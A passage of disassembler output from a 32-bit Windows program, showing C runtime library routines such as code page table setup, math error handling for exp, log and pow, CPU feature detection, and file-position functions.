mov eax, dword_47A3E8
mov [esi+0Ch], eax
xor eax, eax
loc_419525: ; CODE XREF: sub_41945D+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41953D
mov cx, word_47A510[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_419525
; ---------------------------------------------------------------------------
loc_41953D: ; CODE XREF: sub_41945D+CE�j
xor eax, eax
loc_41953F: ; CODE XREF: sub_41945D+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_419556
mov cl, byte_47A400[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41953F
; ---------------------------------------------------------------------------
loc_419556: ; CODE XREF: sub_41945D+EA�j
xor eax, eax
loc_419558: ; CODE XREF: sub_41945D+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_419572
mov cl, byte_47A520[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_419558
; ---------------------------------------------------------------------------
loc_419572: ; CODE XREF: sub_41945D+103�j
mov dword_47A3EC, esi
loc_419578: ; CODE XREF: sub_41945D+9A�j
; sub_41945D+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_419592
cmp esi, dword_47A3EC
jz short loc_419592
push esi
call sub_412FE4
pop ecx
jmp short loc_419592
; ---------------------------------------------------------------------------
loc_41958F: ; CODE XREF: sub_41945D+71�j
mov [ebp+var_1C], edi
loc_419592: ; CODE XREF: sub_41945D+11F�j
; sub_41945D+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4195A4
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41945D endp
; =============== S U B R O U T I N E =======================================
sub_4195A4 proc near ; CODE XREF: sub_41945D+139�p
; DATA XREF: .rdata:stru_427F78�o
push 0Dh
call sub_41686D
pop ecx
retn
sub_4195A4 endp
; =============== S U B R O U T I N E =======================================
sub_4195AD proc near ; CODE XREF: sub_41A15E+9�p
; sub_41A1C7+D�p ...
cmp dword_47B674, 0
jnz short loc_4195C8
push 0FFFFFFFDh
call sub_41945D
pop ecx
mov dword_47B674, 1
loc_4195C8: ; CODE XREF: sub_4195AD+7�j
xor eax, eax
retn
sub_4195AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195CB proc near ; CODE XREF: sub_4141AD+2C�p
; sub_4141AD+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_415456
mov eax, [eax+60h]
cmp eax, dword_47A3EC
jz short loc_4195EA
call sub_419258
loc_4195EA: ; CODE XREF: sub_4195CB+18�j
cmp dword ptr [eax+8], 0
jnz short loc_419601
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_412C40
add esp, 0Ch
jmp short loc_419649
; ---------------------------------------------------------------------------
loc_419601: ; CODE XREF: sub_4195CB+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_419646
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41960D: ; CODE XREF: sub_4195CB+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41964C
inc edi
inc esi
test ecx, ecx
jz short loc_419658
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_419652
and [edi-2], dl
loc_419630: ; CODE XREF: sub_4195CB+85�j
test ecx, ecx
jz short loc_419644
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_419644: ; CODE XREF: sub_4195CB+67�j
; sub_4195CB+8B�j ...
pop esi
pop ebx
loc_419646: ; CODE XREF: sub_4195CB+3B�j
mov eax, [ebp+arg_0]
loc_419649: ; CODE XREF: sub_4195CB+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41964C: ; CODE XREF: sub_4195CB+4F�j
inc edi
inc esi
test dl, dl
jz short loc_419630
loc_419652: ; CODE XREF: sub_4195CB+60�j
test ecx, ecx
jnz short loc_41960D
jmp short loc_419644
; ---------------------------------------------------------------------------
loc_419658: ; CODE XREF: sub_4195CB+55�j
and byte ptr [edi-1], 0
jmp short loc_419644
sub_4195CB endp
; =============== S U B R O U T I N E =======================================
sub_41965E proc near ; CODE XREF: sub_419706+18�p
push esi
push dword_47B670
call sub_41CE2D
pop ecx
mov ecx, dword_47B66C
mov esi, eax
mov eax, dword_47B670
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_4196D1
mov ecx, 800h
cmp esi, ecx
jnb short loc_41968E
mov ecx, esi
loc_41968E: ; CODE XREF: sub_41965E+2C�j
add ecx, esi
push ecx
push eax
call sub_41318A
test eax, eax
pop ecx
pop ecx
jnz short loc_4196B4
add esi, 10h
push esi
push dword_47B670
call sub_41318A
test eax, eax
pop ecx
pop ecx
jnz short loc_4196B4
pop esi
retn
; ---------------------------------------------------------------------------
loc_4196B4: ; CODE XREF: sub_41965E+3D�j
; sub_41965E+52�j
mov ecx, dword_47B66C
sub ecx, dword_47B670
mov dword_47B670, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_47B66C, ecx
loc_4196D1: ; CODE XREF: sub_41965E+23�j
mov [ecx], edi
add dword_47B66C, 4
mov eax, edi
pop esi
retn
sub_41965E endp
; =============== S U B R O U T I N E =======================================
sub_4196DE proc near ; DATA XREF: .data:0042A018�o
push 80h
call sub_41344D
test eax, eax
pop ecx
mov dword_47B670, eax
jnz short loc_4196F6
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_4196F6: ; CODE XREF: sub_4196DE+12�j
and dword ptr [eax], 0
mov eax, dword_47B670
mov dword_47B66C, eax
xor eax, eax
retn
sub_4196DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419706 proc near ; CODE XREF: sub_41973E+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_427F88
call __SEH_prolog
call loc_4143E9
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41965E
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419738
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419706 endp
; =============== S U B R O U T I N E =======================================
sub_419738 proc near ; CODE XREF: sub_419706+24�p
; DATA XREF: .rdata:stru_427F88�o
call sub_4143F2
retn
sub_419738 endp
; =============== S U B R O U T I N E =======================================
sub_41973E proc near ; CODE XREF: sub_4143FB+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_419706
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41973E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419750 proc near ; CODE XREF: .text:loc_414A16�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427F98
call __SEH_prolog
mov [ebp+var_1C], offset dword_4288D0
loc_419763: ; CODE XREF: sub_419750+3C�j
cmp [ebp+var_1C], offset dword_4288D0
jnb short loc_41978E
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_419784
call eax
jmp short loc_419784
; ---------------------------------------------------------------------------
loc_41977D: ; DATA XREF: .rdata:stru_427F98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419781: ; DATA XREF: .rdata:stru_427F98�o
mov esp, [ebp+ms_exc.old_esp]
loc_419784: ; CODE XREF: sub_419750+27�j
; sub_419750+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_419763
; ---------------------------------------------------------------------------
loc_41978E: ; CODE XREF: sub_419750+1A�j
call __SEH_epilog
retn
sub_419750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419794 proc near ; DATA XREF: sub_4143FB:loc_414431�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427FA8
call __SEH_prolog
mov [ebp+var_1C], offset dword_4288D8
loc_4197A7: ; CODE XREF: sub_419794+3C�j
cmp [ebp+var_1C], offset dword_4288D8
jnb short loc_4197D2
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4197C8
call eax
jmp short loc_4197C8
; ---------------------------------------------------------------------------
loc_4197C1: ; DATA XREF: .rdata:stru_427FA8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4197C5: ; DATA XREF: .rdata:stru_427FA8�o
mov esp, [ebp+ms_exc.old_esp]
loc_4197C8: ; CODE XREF: sub_419794+27�j
; sub_419794+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4197A7
; ---------------------------------------------------------------------------
loc_4197D2: ; CODE XREF: sub_419794+1A�j
call __SEH_epilog
retn
sub_419794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197D8 proc near ; CODE XREF: sub_414670+B5�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42CE38
xor eax, [ebp+4]
mov ecx, 0A1h
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
cmp eax, ecx
push esi
jg loc_41990D
jz loc_419901
cmp eax, 18h
jg loc_419891
jz short loc_41987E
push 2
pop ecx
sub eax, ecx
jz short loc_41986F
dec eax
jz short loc_419863
sub eax, 5
jz short loc_419854
dec eax
jz short loc_419848
sub eax, 5
jz short loc_419835
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_4198D2
; ---------------------------------------------------------------------------
loc_419835: ; CODE XREF: sub_4197D8+48�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419848: ; CODE XREF: sub_4197D8+43�j
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_419854: ; CODE XREF: sub_4197D8+40�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419863: ; CODE XREF: sub_4197D8+3B�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_41986F: ; CODE XREF: sub_4197D8+38�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_41987E: ; CODE XREF: sub_4197D8+31�j
mov [ebp+var_24], 3
loc_419885: ; CODE XREF: sub_4197D8+E5�j
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419891: ; CODE XREF: sub_4197D8+2B�j
sub eax, 19h
jz short loc_4198CB
dec eax
jz short loc_4198BF
dec eax
jz short loc_4198B6
dec eax
jz loc_4199F4
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_4198B6: ; CODE XREF: sub_4197D8+C2�j
mov [ebp+var_24], 2
jmp short loc_419885
; ---------------------------------------------------------------------------
loc_4198BF: ; CODE XREF: sub_4197D8+BF�j
mov eax, [ebp+arg_8]
fld1
fstp qword ptr [eax]
jmp loc_419A5E
; ---------------------------------------------------------------------------
loc_4198CB: ; CODE XREF: sub_4197D8+BC�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4198D2: ; CODE XREF: sub_4197D8+58�j
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
mov [ebp+var_24], 4
fstp [ebp+var_C]
call off_42CF48
pop ecx
jmp loc_419A59
; ---------------------------------------------------------------------------
loc_419901: ; CODE XREF: sub_4197D8+22�j
mov [ebp+var_24], 3
jmp loc_41998D
; ---------------------------------------------------------------------------
loc_41990D: ; CODE XREF: sub_4197D8+1C�j
mov ecx, 3EAh
cmp eax, ecx
jg loc_4199D8
jz loc_4199CF
sub eax, 0A2h
jz short loc_419986
sub eax, 4
jz short loc_419976
sub eax, 4
jz short loc_419966
dec eax
jz short loc_41995A
sub eax, 33Dh
jz short loc_41994E
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_41994E: ; CODE XREF: sub_4197D8+161�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_41995A: ; CODE XREF: sub_4197D8+15A�j
mov [ebp+var_20], offset aLog2 ; "log2"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_419966: ; CODE XREF: sub_4197D8+157�j
mov [ebp+var_24], 2
mov [ebp+var_20], offset aLog2 ; "log2"
jmp short loc_419994
; ---------------------------------------------------------------------------
loc_419976: ; CODE XREF: sub_4197D8+152�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp10 ; "exp10"
jmp short loc_419994
; ---------------------------------------------------------------------------
loc_419986: ; CODE XREF: sub_4197D8+14D�j
mov [ebp+var_24], 4
loc_41998D: ; CODE XREF: sub_4197D8+130�j
mov [ebp+var_20], offset aExp2 ; "exp2"
loc_419994: ; CODE XREF: sub_4197D8+6B�j
; sub_4197D8+86�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_42CF48
test eax, eax
pop ecx
jnz loc_419A59
call sub_417C70
mov dword ptr [eax], 22h
jmp loc_419A59
; ---------------------------------------------------------------------------
loc_4199CF: ; CODE XREF: sub_4197D8+142�j
mov [ebp+var_20], offset aExp ; "exp"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_4199D8: ; CODE XREF: sub_4197D8+13C�j
sub eax, 3EBh
jz short loc_419A15
dec eax
jz short loc_419A0C
dec eax
jz short loc_419A03
dec eax
jz short loc_4199F4
dec eax
jnz short loc_419A5E
mov [ebp+var_20], offset aModf ; "modf"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_4199F4: ; CODE XREF: sub_4197D8+C5�j
; sub_4197D8+20E�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4199FB: ; CODE XREF: sub_4197D8+77�j
; sub_4197D8+92�j ...
mov eax, [ebp+arg_0]
mov esi, [ebp+arg_8]
jmp short loc_419A26
; ---------------------------------------------------------------------------
loc_419A03: ; CODE XREF: sub_4197D8+20B�j
mov [ebp+var_20], offset aFloor ; "floor"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_419A0C: ; CODE XREF: sub_4197D8+208�j
mov [ebp+var_20], offset aCeil ; "ceil"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_419A15: ; CODE XREF: sub_4197D8+205�j
mov [ebp+var_20], offset aAtan ; "atan"
loc_419A1C: ; CODE XREF: sub_4197D8+D9�j
; sub_4197D8+171�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov esi, [ebp+arg_8]
fstp qword ptr [esi]
loc_419A26: ; CODE XREF: sub_4197D8+229�j
fld qword ptr [eax]
mov eax, [ebp+arg_4]
fstp [ebp+var_1C]
mov [ebp+var_24], 1
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_42CF48
test eax, eax
pop ecx
jnz short loc_419A59
call sub_417C70
mov dword ptr [eax], 21h
loc_419A59: ; CODE XREF: sub_4197D8+124�j
; sub_4197D8+1E1�j ...
fld [ebp+var_C]
fstp qword ptr [esi]
loc_419A5E: ; CODE XREF: sub_4197D8+4B�j
; sub_4197D8+CC�j ...
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_4182D6
leave
retn
sub_4197D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A6C proc near ; CODE XREF: sub_419AA1+3A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_428068
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A8D: ; DATA XREF: .rdata:stru_428068�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419A91: ; DATA XREF: .rdata:stru_428068�o
mov esp, [ebp+ms_exc.old_esp]
loc_419A94: ; CODE XREF: sub_419A6C+1F�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419A6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419AA1 proc near ; DATA XREF: .data:0042A01C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4
push ebx
push edi
push esi
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_419AC4
push ecx
popf
mov eax, 1
cpuid
loc_419AC4: ; CODE XREF: sub_419AA1+18�j
mov [ebp+var_4], edx
and dword_47A3E4, 0
and dword_47A3E0, 0
test byte ptr [ebp+var_4+3], 4
jz short loc_419AF1
call sub_419A6C
test eax, eax
jz short loc_419AF1
xor eax, eax
inc eax
mov dword_47A3E4, eax
mov dword_47A3E0, eax
loc_419AF1: ; CODE XREF: sub_419AA1+38�j
; sub_419AA1+41�j
xor eax, eax
pop esi
pop edi
pop ebx
leave
retn
sub_419AA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419AF8(double)
sub_419AF8 proc near ; CODE XREF: sub_414670+7�j
; sub_414670+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_42CF4C
call sub_41D6DE
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_419B7E
call sub_41D5AE
test eax, eax
pop ecx
pop ecx
jle short loc_419B61
cmp eax, 2
jle short loc_419B53
cmp eax, 3
jnz short loc_419B61
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Bh ; int
call sub_41D460
add esp, 10h
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419B53: ; CODE XREF: sub_419AF8+3F�j
push esi
push ebx
call sub_41D6DE
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419B61: ; CODE XREF: sub_419AF8+3A�j
; sub_419AF8+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_427A70
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_419BBD
; ---------------------------------------------------------------------------
loc_419B7E: ; CODE XREF: sub_419AF8+2F�j
call sub_41D571
fstp [ebp+var_8]
fld [ebp+var_8]
pop ecx
fcomp [ebp+arg_0]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_419BA3
loc_419B95: ; CODE XREF: sub_419AF8+AE�j
push esi
push ebx
call sub_41D6DE
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419BA3: ; CODE XREF: sub_419AF8+9B�j
test bl, 20h
jnz short loc_419B95
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_419BBD: ; CODE XREF: sub_419AF8+84�j
call sub_41D4B3
add esp, 1Ch
loc_419BC5: ; CODE XREF: sub_419AF8+59�j
; sub_419AF8+67�j ...
pop esi
pop ebx
leave
retn
sub_419AF8 endp
; =============== S U B R O U T I N E =======================================
sub_419BC9 proc near ; CODE XREF: sub_417536+18B�p
; sub_419C3D+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41B76B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_419BEA
call sub_417C70
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419BEA: ; CODE XREF: sub_419BC9+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41F05C ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419C0B
call ds:dword_41F008 ; RtlGetLastWin32Error
jmp short loc_419C0D
; ---------------------------------------------------------------------------
loc_419C0B: ; CODE XREF: sub_419BC9+38�j
xor eax, eax
loc_419C0D: ; CODE XREF: sub_419BC9+40�j
test eax, eax
jz short loc_419C1D
push eax
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_419C3A
; ---------------------------------------------------------------------------
loc_419C1D: ; CODE XREF: sub_419BC9+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_419C3A: ; CODE XREF: sub_419BC9+52�j
pop edi
pop esi
retn
sub_419BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C3D proc near ; CODE XREF: sub_414809+69�p
; sub_414AFC+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00419CCC SIZE 0000001C BYTES
push 0Ch
push offset stru_428078
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_419CCC
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_419CCC
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_419C9C
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_419BC9
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_419CB3
; ---------------------------------------------------------------------------
loc_419C9C: ; CODE XREF: sub_419C3D+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_419CB3: ; CODE XREF: sub_419C3D+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419CC4
mov eax, [ebp+var_1C]
jmp short loc_419CE2
sub_419C3D endp
; =============== S U B R O U T I N E =======================================
sub_419CC1 proc near ; DATA XREF: .rdata:stru_428078�o
mov ebx, [ebp+8]
sub_419CC1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419CC4 proc near ; CODE XREF: sub_419C3D+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_419CC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419C3D
loc_419CCC: ; CODE XREF: sub_419C3D+15�j
; sub_419C3D+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_419CE2: ; CODE XREF: sub_419C3D+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_419C3D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CE8 proc near ; CODE XREF: sub_414809+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_419D04
mov [edi+4], ebx
loc_419D04: ; CODE XREF: sub_419CE8+17�j
push 1
push ebx
push esi
call sub_419C3D
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_419D85
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_419D29
sub eax, [edi+4]
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D29: ; CODE XREF: sub_419CE8+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_419D76
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_47A2E0[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_419D68
mov ecx, edx
cmp ecx, eax
jnb short loc_419D68
loc_419D5B: ; CODE XREF: sub_419CE8+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_419D63
inc [ebp+var_8]
loc_419D63: ; CODE XREF: sub_419CE8+76�j
inc ecx
cmp ecx, [edi]
jb short loc_419D5B
loc_419D68: ; CODE XREF: sub_419CE8+6B�j
; sub_419CE8+71�j ...
cmp [ebp+var_4], 0
jnz short loc_419D8D
mov eax, [ebp+var_8]
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D76: ; CODE XREF: sub_419CE8+50�j
test cl, cl
js short loc_419D68
call sub_417C70
mov dword ptr [eax], 16h
loc_419D85: ; CODE XREF: sub_419CE8+2D�j
or eax, 0FFFFFFFFh
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D8D: ; CODE XREF: sub_419CE8+84�j
test byte ptr [edi+0Ch], 1
jz loc_419E3D
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_419DA6
and [ebp+var_8], ecx
jmp loc_419E3D
; ---------------------------------------------------------------------------
loc_419DA6: ; CODE XREF: sub_419CE8+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:47A2E0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_419E37
push 2
push 0
push [ebp+var_C]
call sub_419C3D
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_419DFE
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_419DF4
; ---------------------------------------------------------------------------
loc_419DEB: ; CODE XREF: sub_419CE8+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_419DF3
inc [ebp+arg_0]
loc_419DF3: ; CODE XREF: sub_419CE8+106�j
inc eax
loc_419DF4: ; CODE XREF: sub_419CE8+101�j
cmp eax, ecx
jb short loc_419DEB
test byte ptr [edi+0Dh], 20h
jmp short loc_419E32
; ---------------------------------------------------------------------------
loc_419DFE: ; CODE XREF: sub_419CE8+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_419C3D
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_419E25
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_419E25
test ch, 4
jz short loc_419E28
loc_419E25: ; CODE XREF: sub_419CE8+12E�j
; sub_419CE8+136�j
mov eax, [edi+18h]
loc_419E28: ; CODE XREF: sub_419CE8+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_419E32: ; CODE XREF: sub_419CE8+114�j
jz short loc_419E37
inc [ebp+arg_0]
loc_419E37: ; CODE XREF: sub_419CE8+E3�j
; sub_419CE8:loc_419E32�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_419E3D: ; CODE XREF: sub_419CE8+A9�j
; sub_419CE8+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_419E45: ; CODE XREF: sub_419CE8+3C�j
; sub_419CE8+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419CE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E4A proc near ; CODE XREF: sub_4148E1+12�p
; sub_414906+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_419E68: ; CODE XREF: sub_419E4A+2B�j
cmp ecx, dword_42CF50[eax*8]
jz short loc_419E77
inc eax
